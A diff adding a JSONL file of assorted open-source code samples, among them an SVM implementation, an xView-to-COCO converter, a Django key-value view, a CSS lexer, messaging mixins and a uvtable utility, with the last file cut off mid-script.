diff --git "a/2397.jsonl" "b/2397.jsonl" new file mode 100644--- /dev/null +++ "b/2397.jsonl" @@ -0,0 +1,707 @@ +{"seq_id":"166179705","text":"# <>\n# Copyright 2022, Lawrence Livermore National Security, LLC.\n# See the top-level COPYRIGHT file for details.\n# \n# SPDX-License-Identifier: BSD-3-Clause\n# <>\n\nimport sys\nsys.path.insert( 0, '../../' )\n\nfrom pqu.PQU import floatToShortestString\n\nvalue = 100\nfor trimZeros in [ 0, 1 ] :\n for keepPeriod in [ 0, 1 ] :\n for favorEFormBy in [ -5, 5 ] :\n for significantDigits in range( 3 ) :\n a = floatToShortestString( value, significantDigits, trimZeros, keepPeriod, favorEFormBy )\n print(trimZeros, keepPeriod, \"%2s\" % favorEFormBy, significantDigits, \"<%s>\" % a)\nprint(floatToShortestString( 1.234e-9, 12 ))\n","sub_path":"pqu/Check/t14.py","file_name":"t14.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"566811698","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\nfrom scipy.spatial.distance import pdist, squareform, cdist\nfrom scipy.optimize import minimize\nimport time\n\n\nclass KernalSVM(object):\n def __init__(self, C, kernel='linear', sigma=.1, random_state=123, verbose=True):\n self.C = C\n self.kernel = kernel\n self.sigma = sigma\n self.random_state = random_state\n self.verbose = verbose\n \n def _L(a, x, y):\n return np.sum(a) - 0.5 * np.sum((a[:, None]*a[None, :])*(y[:, None]*y[None, :])*(x[:, None]*x[None, :]))\n \n \n def fit(self, X, y):\n \n # Add column of ones\n #X = np.hstack((X, np.ones((X.shape[0], 1))))\n \n # get dimensions of X\n n, d = X.shape\n \n # construct gram matrix\n if self.kernel == 'linear':\n G = self.__linear_kernel(X, X)\n elif self.kernel == 'gaussian':\n G = self.__gaussian_kernel(X, X, self.sigma)\n \n #define function to minize\n #f = lambda a: -np.sum(a) + 0.5 * np.sum((a[:, None]*a[None, :])*(y[:, None]*y[None, :])*(X @ X.T))\n f = lambda a: -np.sum(a) + 0.5 * np.sum((a[:, None]*a[None, :])*(y[:, None]*y[None, :])*G)\n jac = lambda a: np.dot(a, (y[:, None]*y[None, :])*G) - np.ones(a.shape[0])\n #initial guess\n np.random.seed(self.random_state)\n a0 = np.random.rand(X.shape[0])\n \n cons = ({'type': 'eq', 'fun': lambda a: np.dot(a,y), 'jac': lambda a: y}, \n #{'type': 'ineq', 'fun': lambda a: a}, {'type': 'ineq', 'fun': lambda a: self.C - a}\n )\n bnds = [(0, self.C)]*X.shape[0]\n \n res = minimize(f, a0, method='SLSQP', jac=jac, constraints=cons, bounds=bnds, options={'disp': self.verbose})\n \n self.alphas_ = res.x\n if self.kernel == 'linear':\n self.w_ = np.sum(self.alphas_*y*X.T, axis=1)[:, np.newaxis]\n self.bl_ = np.mean(y - np.dot(self.w_.T, X.T))\n self.b_ = np.mean(y - np.sum((self.alphas_*y)[:, np.newaxis]*G, axis=0))\n self.X_ = X.copy() # used in predicting\n self.y_ = y.copy()\n \n return self\n \n def predict(self, X):\n \n if self.kernel == 'linear':\n K = self.__linear_kernel(self.X_, X)\n elif self.kernel == 'gaussian':\n K = self.__gaussian_kernel(self.X_, X, self.sigma)\n \n return np.sign(np.sum((self.alphas_*self.y_)[:, np.newaxis]*K, axis=0) + self.b_)\n \n #return np.sign(np.dot(self.w_.T, X.T) + self.b_)\n \n def __gaussian_kernel(self, x, z, sigma):\n \n #K = np.exp(-(np.linalg.norm(x-z, 2)**2)/sigma)\n K = np.exp(-(cdist(x, z, 'euclidean')**2)/sigma)\n #print('K: ', K)\n return K\n \n def __linear_kernel(self, x, z):\n \n K = np.dot(x, z.T)\n \n return K\n\t\t\n\n\ndef cost(y_true, y_pred):\n n = len(y_true)\n return np.sum(y_true != y_pred)/n\t\n\t\n\t\n\t\n\t\nif __name__ == \"__main__\":\n\n\tprint('-'*50)\n\tprint('Loading Data ...', end='')\n\ttrain_dsn = pd.read_csv(r\"../bank-note/train.csv\", \n\t\t\t\t\t\t\theader=None, \n\t\t\t\t\t\t\tnames=['variance', 'skewness', 'curtosis', 'entropy', 'label'])\n\ttest_dsn = pd.read_csv(f\"../bank-note/test.csv\", \n\t\t\t\t\t\t header=None,\n\t\t\t\t\t\t names=['variance', 'skewness', 'curtosis', 'entropy', 'label'])\n\t\t\t\t\t\t \n\ttrain_dsn['label'] = train_dsn.apply(lambda x: -1 if x['label'] == 0 else 1, axis=1)\n\ttest_dsn['label'] = test_dsn.apply(lambda x: -1 if x['label'] == 0 else 1, axis=1)\n\t\n\tX_train = train_dsn[[x for x in train_dsn.columns if x not in ['label']]].values\n\ty_train = train_dsn['label'].values\n\tX_test = test_dsn[[x for x in test_dsn.columns if x not in ['label']]].values\n\ty_test = test_dsn['label'].values\n\t\n\tprint('completed.')\n\tprint()\n\t\n\tprint('-'*50)\n\tprint('Running dual SVM...')\n\t\n\tprint('KERNEL: LINEAR')\n\tC = [100/873, 500/873, 700/873]\n\tfor c in C:\n\t\tprint('-'*50)\n\t\tprint('C: ', c)\n\t\tstart_time = time.time()\n\t\tres = KernalSVM(C=c, kernel='linear', verbose=True, random_state=1138).fit(X_train, y_train)\n\t\tprint('weights: ', res.w_.T, 'intercept: ', res.b_)\n\t\tpred_train = res.predict(X_train)\n\t\tpred_test = res.predict(X_test)\n\t\tprint('training error: ', cost(y_train, pred_train))\n\t\tprint('testing error: ', cost(y_test, pred_test))\n\t\tend_time = time.time()\n\t\tprint('Running Time: ', end_time - start_time)\n\t\t\n\tprint('KERNEL: GAUSSIAN')\n\tC = [100/873, 500/873, 700/873]\n\tsigma = [0.01, 0.1, 0.5, 1, 2, 5, 10, 100]\n\talpha_list = []\n\tfor c in C:\n\t\tfor s in sigma:\n\t\t\tprint('-'*50)\n\t\t\tprint('C: ', c, 'Sigma: ', s)\n\t\t\tstart_time = time.time()\n\t\t\tres = KernalSVM(C=c, kernel='gaussian', sigma=s).fit(X_train, y_train)\n\t\t\t#print('weights: ', res.w_, 'intercept: ', res.b_)\n\t\t\talpha_list.append(res.alphas_)\n\t\t\tpred_train = res.predict(X_train)\n\t\t\tpred_test = res.predict(X_test)\n\t\t\tprint('training error: ', cost(y_train, pred_train))\n\t\t\tprint('testing error: ', cost(y_test, pred_test))\n\t\t\tend_time = time.time()\n\t\t\tprint('Running Time: ', end_time - start_time)\n\t\t\t\n\tprint()\n\tprint('Number of support vectors: ')\n\tfor i in range(len(alpha_list)):\n\t\tprint(np.sum(alpha_list[i] > 0))\n\t\t\t\n\tprint()\n\tprint('For 500/873, number of shared support vectors:')\n\tfor i in range(8, 15):\n\t\tprint('C={}, gamma={}-{}: {}, {}'.format(500/873, sigma[i-8], sigma[i-8+1], np.sum(alpha_list[i] > 0), np.sum(alpha_list[i+1] > 0)))\n\t\tprint(np.sum(np.bitwise_and((alpha_list[i] > 0),(alpha_list[i+1] > 0))))\n","sub_path":"src/SVM/kernel_svm.py","file_name":"kernel_svm.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"190246778","text":"import re\nimport datetime\ndef clean_data(data,timestamp):\n\tif timestamp==False:\n\t\tdata=data.encode('utf-8')\n\t\tdata=data.strip()\n\t\tdata=data.replace('\\n', ' ').replace('\\r', '')\n\t\tdata=re.sub('[^A-Za-z0-9 ]+', '', data)\n\t\tif data==None or not data.strip():\n\t\t\tdata=\"Nothing\"\n\telse:\n\t\tdata=data.split(\".\")\n\t\tdata.remove(data[-1])\n\t\tdata=datetime.datetime.strptime(\" \".join(data),'%Y-%m-%d %H:%M:%S')\n\treturn data\n","sub_path":"dependencies/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"590711000","text":"# MatthewInkawhich\n\n'''\nThis script is a utility to convert the original xView dataset to COCO format.\n'''\nimport aug_util as aug\nimport wv_util as wv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nimport glob\nimport argparse\nimport os\nimport json\nimport skimage.io \n \n\nclass xView_JSON_Dict():\n def __init__(self, class_names_LUT):\n # Initialize ID runners\n self.img_id = 0\n self.ann_id = 0\n # Initialize head\n self.head = {}\n # Add info branch\n self.head[\"info\"] = {\n \"description\": \"xView Dataset for 2018 Challenge\",\n \"url\": \"http://xviewdataset.org\",\n \"version\": \"1.0\",\n \"year\": 2018,\n \"contributor\": \"DIUx\",\n \"date_created\": \"2018/01/01\"\n }\n # Add licenses branch\n self.head[\"licenses\"] = [{\n \"url\": \"http://xviewdataset.org\",\n \"id\": 1,\n \"name\": \"xView License\"\n }]\n # Initialize images branch\n self.head[\"images\"] = []\n # Initialize annotations branch\n self.head[\"annotations\"] = []\n # Add categories branch\n self.head[\"categories\"] = []\n for key, value in class_names_LUT.items():\n self.head[\"categories\"].append({\n \"supercategory\": \"object\",\n \"id\": key,\n \"name\": value\n })\n\n\n # Add an image AND its corresponding annotations to the dict\n def add_image(self, file_name, width, height, boxes, int_classes):\n # Add entry to images branch\n self.head[\"images\"].append({\n \"id\": self.img_id,\n \"width\": width,\n \"height\": height,\n \"file_name\": file_name,\n \"license\": 1,\n \"flickr_url\": \"N/A\",\n \"coco_url\": \"N/A\",\n \"date_captured\": \"2018/01/01\"\n })\n\n # Add entries to annotations branch\n for i in range(len(int_classes)):\n self.head[\"annotations\"].append({\n \"id\": self.ann_id,\n \"image_id\": self.img_id,\n \"category_id\": int_classes[i],\n \"segmentation\": [],\n \"area\": boxes[i][2] * boxes[i][3], # Area is box w * h\n \"iscrowd\": 0,\n \"bbox\": boxes[i]\n })\n # Increment annotation id\n self.ann_id += 1\n\n # Increment image id\n self.img_id += 1\n\n # Write the dict structure to file\n def write_file(self, out_path, indent=None):\n with open(out_path, 'w') as outfile:\n json.dump(self.head, outfile, indent=indent)\n\n\n# Define a function for translating full labels to simple labels\ndef convert_full_to_simple(full_boxes, full_classes):\n full_to_simple_translator = {\n (11,12,13): 1,\n (17,18,19): 2,\n (71,72,73,74,76,77): 3,\n (20,21,23,24,25,27,28,29): 4,\n (33,34,35,36,37,38): 5,\n (40,41,42,44,45,47,49,50,51,52): 6,\n (53,54,55,56,57,59,60,61,62,63,64,65,66,32): 7\n }\n simple_boxes = []\n simple_classes = []\n for j in range(len(full_classes)):\n for k, v in full_to_simple_translator.items():\n if full_classes[j] in k:\n simple_boxes.append(full_boxes[j])\n simple_classes.append(v)\n break\n return simple_boxes, simple_classes\n\n\n\n# Define how to clip a value\ndef clip(old, minimum, maximum):\n if old < minimum:\n return minimum\n elif old > maximum:\n return maximum\n return old\n \n\n######### Inputs\nTRAIN = True\nCHIP_SIZE = 600\nOLD_ROOT = \"../xView\"\nNEW_ROOT = \"../xView-coco-{}\".format(CHIP_SIZE)\nCHIP_SHAPE = (CHIP_SIZE, CHIP_SIZE)\nBOX_AREA_THRESH = 20\nOVERLAP = 0.20\n#########\n\n# Set image path and ff_list path based on TRAIN\nIMG_PATH = NEW_ROOT+\"/train_images/\" if TRAIN else NEW_ROOT+\"/val_images/\"\nANNOTATION_PATH_FULL = NEW_ROOT+\"/annotations/train_full.json\" if TRAIN else NEW_ROOT+\"/annotations/val_full.json\"\nANNOTATION_PATH_SIMPLE = NEW_ROOT+\"/annotations/train_simple.json\" if TRAIN else NEW_ROOT+\"/annotations/val_simple.json\"\nFF_LIST_PATH = NEW_ROOT+\"/meta/ff_train.txt\" if TRAIN else NEW_ROOT+\"/meta/ff_val.txt\"\nDEGREES = [0, 10, 90, 180, 270] if TRAIN else [0]\n\n# Create the Class # -> Class Label Dictionary\nclass_names_LUT_full = {}\nwith open('xview_class_labels.txt') as f:\n for row in csv.reader(f):\n class_names_LUT_full[int(row[0].split(\":\")[0])] = row[0].split(\":\")[1]\n\n# Create the Class # -> Class Label Dictionary\nclass_names_LUT_simple = {}\nwith open('xview_class_labels_simple.txt') as f:\n for row in csv.reader(f):\n class_names_LUT_simple[int(row[0].split(\":\")[0])] = row[0].split(\":\")[1]\n\n\n# Load all of the labels from .geojson\nall_coords, all_chips, all_classes = wv.get_labels(OLD_ROOT + \"/xView_train.geojson\")\n\nprint(\"Full Dataset Stats:\")\nprint(all_coords.shape)\nprint(all_chips.shape)\nprint(all_classes.shape)\n\n\n# Create directories if they don't exist\nif not os.path.isdir(NEW_ROOT+\"/annotations\"):\n os.makedirs(NEW_ROOT+\"/annotations\")\nif not os.path.isdir(IMG_PATH):\n os.makedirs(IMG_PATH)\n\n# Get all of the unique .tif names from all_chips\n#tif_names = np.unique(all_chips)\n\n\ntif_names = [line.rstrip('\\n') for line in open(FF_LIST_PATH)]\n\nprint(\"tif_names:\", tif_names)\n\n\n# Initialize JSON_Dict object\njson_dict_full = xView_JSON_Dict(class_names_LUT_full)\njson_dict_simple = xView_JSON_Dict(class_names_LUT_simple)\n\n\n# For each unique .tif\nfor tif_idx, unique_tif in enumerate(tif_names):\n\n print(\"Working on: [{} / {}] {} \".format(tif_idx+1, len(tif_names), unique_tif))\n\n # Make sure the file exists\n if not os.path.isfile(OLD_ROOT+\"/train_images/\"+unique_tif):\n continue\n\n # Get the info relevant to this single full frame .tif\n ff_coords = all_coords[all_chips==unique_tif]\n ff_classes = all_classes[all_chips==unique_tif].astype(np.int64)\n print(\"\\tTotal Num Targets: \",len(ff_classes))\n\n # Chip the image into smaller pieces\n arr = wv.get_image(OLD_ROOT+\"/train_images/\"+unique_tif) \n #c_img, c_box, c_cls = wv.chip_image(img=arr, coords=ff_coords, classes=ff_classes, shape=CHIP_SHAPE)\n c_img, c_box, c_cls, _ = wv.chip_image_overlap(img=arr, coords=ff_coords, classes=ff_classes, shape=CHIP_SHAPE, overlap=OVERLAP)\n num_chips = len(c_img)\n print(\"\\tNum Chips: \",num_chips)\n\n # For each image chip (i in range(num_chips))\n for i in range(num_chips): \n\n print(\"\\t\\tChip #: \",i)\n\n # Calculate the center of the chip\n center = (int(c_img[i].shape[0]/2),int(c_img[i].shape[1]/2))\n\n # For each of the desired rotation degrees\n for deg in DEGREES:\n\n # Rotate the original chip and get the updated image/boxes/classes \n tmp_img,tmp_box,tmp_cls = aug.rotate_image_and_boxes(c_img[i], deg, center, c_box[i], c_cls[i])\n\n # Git rid of very small boxes that are artifacts of chipping\n final_boxes = []\n final_classes = []\n final_classes_simple = []\n\n # Clip boxes correctly!!\n clipped_boxes = []\n for box in tmp_box:\n xMin,yMin,xMax,yMax = box\n xMin = clip(xMin, 0, CHIP_SHAPE[0]-1)\n yMin = clip(yMin, 0, CHIP_SHAPE[1]-1)\n xMax = clip(xMax, 0, CHIP_SHAPE[0]-1)\n yMax = clip(yMax, 0, CHIP_SHAPE[1]-1)\n clipped_boxes.append([xMin, yMin, xMax, yMax])\n \n\n # Eliminate clipped boxes whose area is too small\n for j,box in enumerate(clipped_boxes):\n xMin,yMin,xMax,yMax = box\n box_area = (xMax-xMin)*(yMax-yMin)\n box_width = xMax - xMin + 1\n box_height = yMax - yMin + 1\n if box_area > BOX_AREA_THRESH:\n # Excludes odd error cases\n if tmp_cls[j] in class_names_LUT_full.keys(): \n # COCO expects boxes in [top-left x, top-left y, w, h] format\n final_boxes.append([int(xMin), int(yMin), int(box_width), int(box_height)])\n final_classes.append(int(tmp_cls[j]))\n \n # Create simple class annotations\n final_boxes_simple, final_classes_simple = convert_full_to_simple(final_boxes, final_classes)\n\n \n # Construct the saved chip name\n chip_name = \"img_{}_{}_rot{}.jpg\".format(unique_tif.split(\".\")[0], i, deg)\n\n # TIME TO WRITE**\n # First, check that the files do not already exist before writing\n #if os.path.exists(NEW_ROOT+\"/annotations/\"+xml_name) and os.path.exists(NEW_ROOT+\"/JPEGImages/\"+chip_name):\n # continue\n \n # Convert the integer class labels to english labels\n #final_english_classes = [class_names_LUT_full[lbl] for lbl in final_classes]\n assert(len(final_boxes) == len(final_classes))\n\n # Add to annotation dictionary\n json_dict_full.add_image(chip_name, CHIP_SHAPE[1], CHIP_SHAPE[0], final_boxes, final_classes)\n json_dict_simple.add_image(chip_name, CHIP_SHAPE[1], CHIP_SHAPE[0], final_boxes, final_classes_simple)\n\n # Save the chipped image to disk\n #skimage.io.imsave(IMG_PATH+chip_name, tmp_img) #, quality=100) \n\n# The last step is to write the final JSON_Dict to json file\njson_dict_full.write_file(ANNOTATION_PATH_FULL, indent=None) \njson_dict_simple.write_file(ANNOTATION_PATH_SIMPLE, indent=None) \n","sub_path":"create_xView_coco_dataset.py","file_name":"create_xView_coco_dataset.py","file_ext":"py","file_size_in_byte":9607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"215359592","text":"from django.shortcuts import render\nfrom key_value.models import Store\nfrom django.http import HttpResponse,JsonResponse\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom datetime import datetime,timedelta\nfrom django.core import serializers\n\n# Create your views here.\n@csrf_exempt\ndef values(request):\n \n if request.method == \"GET\":\n\n Store.objects.filter(created_at__lte = (datetime.now() - timedelta(minutes = 5))).delete()\n # return key values\n keys = request.GET.get('keys', None)\n if keys is None:\n # return all value\n data = {}\n store = Store.objects.all()\n for row in store:\n data[row.key] = row.value\n \n return JsonResponse(data)\n else:\n store = Store.objects.all()\n allKeys = keys.split(',')\n data = {}\n for row in store:\n if(row.key in allKeys):\n temp_store = Store.objects.filter(key = row.key).get()\n temp_store.created_at = datetime.now()\n temp_store.save()\n data[row.key] = temp_store.value\n return JsonResponse(data)\n\n if request.method == \"POST\":\n #save data\n data = json.loads(request.body)\n for k in data:\n store = Store(key=k, value=data[k],created_at = datetime.now())\n store.save()\n return JsonResponse({})\n \n if request.method == \"PATCH\":\n # edits data\n store = Store.objects.all()\n data = json.loads(request.body)\n for row in store:\n if(row.key in data.keys()):\n temp_store = Store.objects.filter(key = row.key).get()\n temp_store.created_at = datetime.now()\n temp_store.value = data[row.key]\n temp_store.save()\n return JsonResponse({})","sub_path":"key_value/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"579117836","text":"import re\nfrom Rutas import Rutas\nfrom ReporteErrores import ReporteErrores\nsignos=['%','#','\\*', '\\-' , '\\{', '\\}', '\\;', '\\,', '\\.', '\\:','\\(','\\)']\nlinea = 0\ncolumna = 0\ncontador = 0\nRecuperacion=\"\"\n\nErrores = []\nBitacora=[] #[Lexema,Estado, Token, Aceptacion]\npalabrasReservadas = ['mm','pt','pc','cm','in','vw','vh','em','px','position','bottom','color','display','top','float','Opacity', 'width','right','clear','height','left','text-align','border', 'border-style','font-weight', 'font-style','font-family','font-size','padding-left','padding-bottom','padding-top','padding-right','line-height','min-width','min-height','margin','margin-right','margin-bottom','margin-top','margin-left','max-height','max-width','background-image','background','background-image', ]#text-align \n\n\nclass AnalizadorL_CSS(ReporteErrores,Rutas):\n\n \n def funcMainCSS(self, Entrada):\n global contador, Errores, Recuperacion, Bitacora\n Salida=\"\"\n clase = AnalizadorL_CSS() \n contador=0\n Errores=[]\n Bitacora=[]\n tokens = clase.Analizador(Entrada+\"#\")\n PalabrasReservadas(tokens)\n for token in tokens:\n print(token)\n #Salida+=listToString(token)+\"\\n\"\n print(\"---------ERRORES:--------\")\n Salida+=\"---------------BITÁCORA:--------------\"+\"\\n\"\n Salida+=\"\\n[Lexema, Estado, Token, Aceptación]\\n\"\n if(len(Errores)!=0):\n clase.GenerarReporte(Errores,\"Reporte Analizador de CSS\")\n for err in Errores:\n print (err)\n #Salida+=listToString(err)+\"\\n\"\n if(len(tokens)!=0 and len(Recuperacion)!=0):\n clase.CrearRuta(tokens, Recuperacion,\"css\")\n Recuperacion=\"\"\n if(len(Bitacora)!=0):\n for tok in Bitacora:\n Salida+=printBitacora(tok)+\"\\n\"\n \n return Salida\n #END\n\n def Analizador(self, Entrada):\n global linea, columna, contador, Errores, Recuperacion,Bitacora\n linea = 1\n columna = 1\n listaTokens = []\n\n while contador < len(Entrada)-1:\n if Entrada[contador]==\"/\": #COMENTARIOS\n aux=\"\"\n if Entrada[contador+1]==\"*\" and (contador+1)\"\n counter+=1\n elif (counter==1):\n stri+=str(token[counter])+\"--> \"\n counter+=1\n elif (counter==2):\n stri+=str(token[counter])+\"--> \"\n counter+=1\n elif (counter==3):\n stri+=str(token[counter])+\"] \"\n counter+=1 \n\n return stri\n#END\n\n\n\n\nEntradaTexto= open('entrada.olc1')\ncontenido = EntradaTexto.read()\n\n\n\nif __name__ == \"__main__\":\n clase = AnalizadorL_CSS()\n clase.funcMainCSS(contenido)","sub_path":"Proyecto1_Compi1/AL/AnalizadorL_CSS.py","file_name":"AnalizadorL_CSS.py","file_ext":"py","file_size_in_byte":12592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"262034804","text":"from typing import Any, Dict\nfrom weakref import ref\n\nfrom flask import Blueprint\nfrom kombu import Connection\nfrom rethinkdb.ast import Table\n\nfrom pysite.constants import (\n BOT_EVENT_QUEUE, BotEventTypes,\n RMQ_HOST, RMQ_PASSWORD, RMQ_PORT, RMQ_USERNAME\n)\nfrom pysite.database import RethinkDB\nfrom pysite.oauth import OAuthBackend\n\n\nBOT_EVENT_REQUIRED_PARAMS = {\n \"mod_log\": (\"level\", \"title\", \"message\"),\n \"send_message\": (\"target\", \"message\"),\n \"send_embed\": (\"target\",),\n \"add_role\": (\"target\", \"role_id\", \"reason\"),\n \"remove_role\": (\"target\", \"role_id\", \"reason\")\n}\n\n\nclass DBMixin:\n \"\"\"\n Mixin for classes that make use of RethinkDB. It can automatically create a table with the specified primary\n key using the attributes set at class-level.\n\n This class is intended to be mixed in alongside one of the other view classes. For example:\n\n >>> class MyView(APIView, DBMixin):\n ... name = \"my_view\" # Flask internal name for this route\n ... path = \"/my_view\" # Actual URL path to reach this route\n ... table_name = \"my_table\" # Name of the table to create\n ... table_primary_key = \"username\" # Primary key to set for this table\n\n This class will also work with Websockets:\n\n >>> class MyWebsocket(WS, DBMixin):\n ... name = \"my_websocket\"\n ... path = \"/my_websocket\"\n ... table_name = \"my_table\"\n ... table_primary_key = \"username\"\n\n You may omit `table_primary_key` and it will be defaulted to RethinkDB's default column - \"id\".\n \"\"\"\n\n table_name = \"\" # type: str\n table_primary_key = \"id\" # type: str\n\n @classmethod\n def setup(cls: \"DBMixin\", manager: \"pysite.route_manager.RouteManager\", blueprint: Blueprint):\n \"\"\"\n Set up the view by creating the table specified by the class attributes - this will also deal with multiple\n inheritance by calling `super().setup()` as appropriate.\n\n :param manager: Instance of the current RouteManager (used to get a handle for the database object)\n :param blueprint: Current Flask blueprint\n \"\"\"\n\n if hasattr(super(), \"setup\"):\n super().setup(manager, blueprint) # pragma: no cover\n\n cls._db = ref(manager.db)\n\n @property\n def table(self) -> Table:\n return self.db.query(self.table_name)\n\n @property\n def db(self) -> RethinkDB:\n return self._db()\n\n\nclass RMQMixin:\n \"\"\"\n Mixin for classes that make use of RabbitMQ. It allows routes to send JSON-encoded messages to specific RabbitMQ\n queues.\n\n This class is intended to be mixed in alongside one of the other view classes. For example:\n\n >>> class MyView(APIView, RMQMixin):\n ... name = \"my_view\" # Flask internal name for this route\n ... path = \"/my_view\" # Actual URL path to reach this route\n ... queue_name = \"my_queue\" # Name of the RabbitMQ queue to send on\n\n Note that the queue name is optional if all you want to do is send bot events.\n\n This class will also work with Websockets:\n\n >>> class MyWebsocket(WS, RMQMixin):\n ... name = \"my_websocket\"\n ... path = \"/my_websocket\"\n ... queue_name = \"my_queue\"\n \"\"\"\n\n queue_name = \"\"\n\n @classmethod\n def setup(cls: \"RMQMixin\", manager: \"pysite.route_manager.RouteManager\", blueprint: Blueprint):\n \"\"\"\n Set up the view by calling `super().setup()` as appropriate.\n\n :param manager: Instance of the current RouteManager (used to get a handle for the database object)\n :param blueprint: Current Flask blueprint\n \"\"\"\n\n if hasattr(super(), \"setup\"):\n super().setup(manager, blueprint) # pragma: no cover\n\n @property\n def rmq_connection(self) -> Connection:\n \"\"\"\n Get a Kombu AMQP connection object - use this in a context manager so that it gets closed after you're done\n\n If you're just trying to send a message, check out `rmq_send` and `rmq_bot_event` instead.\n \"\"\"\n\n return Connection(hostname=RMQ_HOST, userid=RMQ_USERNAME, password=RMQ_PASSWORD, port=RMQ_PORT)\n\n def rmq_send(self, data: Dict[str, Any], routing_key: str = None):\n \"\"\"\n Send some data to the RabbitMQ queue\n\n >>> self.rmq_send({\n ... \"text\": \"My hovercraft is full of eels!\",\n ... \"source\": \"Dirty Hungarian Phrasebook\"\n ... })\n ...\n\n This will be delivered to the queue immediately.\n \"\"\"\n\n if routing_key is None:\n routing_key = self.queue_name\n\n with self.rmq_connection as c:\n producer = c.Producer()\n producer.publish(data, routing_key=routing_key)\n\n def rmq_bot_event(self, event_type: BotEventTypes, data: Dict[str, Any]):\n \"\"\"\n Send an event to the queue responsible for delivering events to the bot\n\n >>> self.rmq_bot_event(BotEventTypes.send_message, {\n ... \"channel\": CHANNEL_MOD_LOG,\n ... \"message\": \"This is a plain-text message for @everyone, from the site!\"\n ... })\n ...\n\n This will be delivered to the bot and actioned immediately, or when the bot comes online if it isn't already\n connected.\n \"\"\"\n\n if not isinstance(event_type, BotEventTypes):\n raise ValueError(\"`event_type` must be a member of the the `pysite.constants.BotEventTypes` enum\")\n\n event_type = event_type.value\n required_params = BOT_EVENT_REQUIRED_PARAMS[event_type]\n\n for param in required_params:\n if param not in data:\n raise KeyError(f\"Event is missing required parameter: {param}\")\n\n return self.rmq_send(\n {\"event\": event_type, \"data\": data},\n routing_key=BOT_EVENT_QUEUE,\n )\n\n\nclass OAuthMixin:\n \"\"\"\n Mixin for the classes that need access to a logged in user's information. This class should be used\n to grant route's access to user information, such as name, email, id, ect.\n\n There will almost never be a need for someone to inherit this, as BaseView does that for you.\n\n This class will add 3 properties to your route:\n\n * logged_in (bool): True if user is registered with the site, False else wise.\n\n * user_data (dict): A dict that looks like this:\n\n {\n \"user_id\": Their discord ID,\n \"username\": Their discord username (without discriminator),\n \"discriminator\": Their discord discriminator,\n \"email\": Their email, in which is connected to discord\n }\n\n user_data returns None, if the user isn't logged in.\n\n * oauth (OAuthBackend): The instance of pysite.oauth.OAuthBackend, connected to the RouteManager.\n \"\"\"\n\n @classmethod\n def setup(cls: \"OAuthMixin\", manager: \"pysite.route_manager.RouteManager\", blueprint: Blueprint):\n if hasattr(super(), \"setup\"):\n super().setup(manager, blueprint) # pragma: no cover\n\n cls._oauth = ref(manager.oauth_backend)\n\n @property\n def logged_in(self) -> bool:\n return self.user_data is not None\n\n @property\n def user_data(self) -> dict:\n return self.oauth.user_data()\n\n @property\n def oauth(self) -> OAuthBackend:\n return self._oauth()\n","sub_path":"pysite/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":7250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"426291825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\n\n\nclass DivZeroTestCase(unittest.TestCase):\n\n def test_should_raise_exception(self):\n with self.assertRaises(ZeroDivisionError):\n 1 / 0\n # 2 / 3\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_exception.py","file_name":"test_exception.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"554361020","text":"#!/usr/bin/env python\n# \n# An alternative Python code to print u v w from the input uvtable\n# if the uv table has only one channel and one stokes, then we also output re im wt amp\n# \n\nimport os, sys, re\nimport numpy as np\nimport astropy\nfrom astropy.table import Table\nfrom astropy.io import fits\nimport astropy.constants as const\nfrom copy import copy\nimport shutil\nimport itertools\nfrom collections import OrderedDict\n\n# \n# read user input\nuvt_names = []\nout_name = ''\nkeep_zeros = False\niarg = 1\narg_mode = ''\nwhile iarg < len(sys.argv):\n arg_str = sys.argv[iarg].lower().replace('--','-')\n if arg_str == '-name':\n arg_mode = 'name'\n iarg += 1\n continue\n elif arg_str == '-out':\n arg_mode = 'out'\n iarg += 1\n continue\n elif arg_str == '-keep-zeros' or arg_str == '-keepzeros':\n arg_mode = ''\n keep_zeros = True\n iarg += 1\n continue\n elif arg_str == '-keep-files' or arg_str == '-keepfiles':\n arg_mode = ''\n iarg += 1\n continue\n # \n if arg_mode == 'name':\n if not os.path.isfile(sys.argv[iarg]):\n print('Error! The input file \"%s\" does not exist!'%(sys.argv[iarg]))\n sys.exit()\n uvt_names.append(sys.argv[iarg])\n elif arg_mode == 'out':\n out_name = sys.argv[iarg]\n # \n iarg += 1\n\n\n# \n# print usage\nif len(uvt_names) == 0 or out_name == '':\n print('')\n print('Usage: ')\n print(' pdbi-uvt-raw-uvtable-print-u-v-w.py -name uvtable_spw1_example.uvt -out output_u_v_w_re_im_wt_table.txt')\n print('')\n print('Notes:')\n print(' -- This code allows to input *.uvt or *.uvfits, but uvfits must be generated in CASA data structure type.')\n print(' In the case of inputting a *.uvt, we will call GILDAS MAPPING FITS command to convert it to *.uvfits.')\n print(' -- The output file is a table with 4 or 7 columns: ')\n print(' If the input data has more than one channel or stokes, then we output 4 columns: ivis, u, v, w.')\n print(' Else if the input data has only one channel and one stokes, then we output 7 columns: ivis, u, v, w, re, im, wt, amp.')\n print(' The output format can be either *.txt or *.csv or *.fits.')\n print(' -- Data rows where re, im, wt are all zeros will not be output, this can happen for some edge channels,')\n print(' and thus the output table might not have a uniform block size. To keep those zero rows, use the -keep-zeros option.')\n print('')\n 